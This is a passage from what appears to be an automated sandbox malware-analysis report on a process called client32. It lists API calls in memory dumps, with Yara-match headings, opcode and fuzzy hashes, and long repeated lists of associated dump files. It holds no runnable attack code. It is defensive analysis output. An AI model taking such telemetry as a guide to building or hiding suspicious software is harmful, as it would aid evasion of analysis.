                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                • String ID:
                                                                                • API String ID: 2782032738-0
                                                                                • Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                                • Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                                APIs
                                                                                • MessageBeep.USER32(00000000), ref: 1106791B
                                                                                • MessageBeep.USER32(00000000), ref: 11067957
                                                                                • MessageBeep.USER32(00000000), ref: 110679AA
                                                                                • MessageBeep.USER32(00000000), ref: 110679EB
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BeepMessage
                                                                                • String ID:
                                                                                • API String ID: 2359647504-0
                                                                                • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                                • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                                APIs
                                                                                  • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                  • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                • _malloc.LIBCMT ref: 110491DD
                                                                                • _memmove.LIBCMT ref: 110491EA
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00040310,?,00000002,00001388,?), ref: 11049224
                                                                                • _free.LIBCMT ref: 1104922B
                                                                                  • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                  • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                  • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                • String ID:
                                                                                • API String ID: 176360892-0
                                                                                • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
                                                                                • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
                                                                                • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
                                                                                • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SleepThread$CreateMessagePost
                                                                                • String ID:
                                                                                • API String ID: 3347742789-0
                                                                                • Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                                • Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                                • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                                • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,1B702977,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                                • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                                • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                • String ID:
                                                                                • API String ID: 3394196147-0
                                                                                • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                                • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                                APIs
                                                                                  • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,1B702977,00000000,00002710,00000001,11027140,1B702977,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                • IsWindow.USER32(00000000), ref: 110436DE
                                                                                • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                                • String ID:
                                                                                • API String ID: 3558565530-0
                                                                                • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                                • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,1B702977,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B383F
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B385E
                                                                                • SetEvent.KERNEL32(?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38A4
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38AB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                • String ID:
                                                                                • API String ID: 3394196147-0
                                                                                • Opcode ID: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
                                                                                • Instruction ID: 58af85e25f85a47ca3d7134065c146d8b9d4bc60aa5d6e9c2c74ed7e6f1a2d6e
                                                                                • Opcode Fuzzy Hash: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
                                                                                • Instruction Fuzzy Hash: 1C21DF72A047089FD315CFA8D884B9AF7E8FB48315F104A3EE816C7A04E739B404CB94
                                                                                APIs
                                                                                • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$RectText
                                                                                • String ID:
                                                                                • API String ID: 4034337308-0
                                                                                • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                APIs
                                                                                • SetEvent.KERNEL32 ref: 110675BB
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchEvent
                                                                                • String ID:
                                                                                • API String ID: 4257095537-0
                                                                                • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                APIs
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AtomDeleteGlobal$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 964255742-0
                                                                                • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                                • SetFocus.USER32(?), ref: 11007403
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                • String ID: edit
                                                                                • API String ID: 1305092643-2167791130
                                                                                • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                • _memmove.LIBCMT ref: 11009336
                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                • String ID: string too long
                                                                                • API String ID: 2168136238-2556327735
                                                                                • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 256744135-2556327735
                                                                                • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                APIs
                                                                                • _calloc.LIBCMT ref: 1103B162
                                                                                • _free.LIBCMT ref: 1103B25B
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
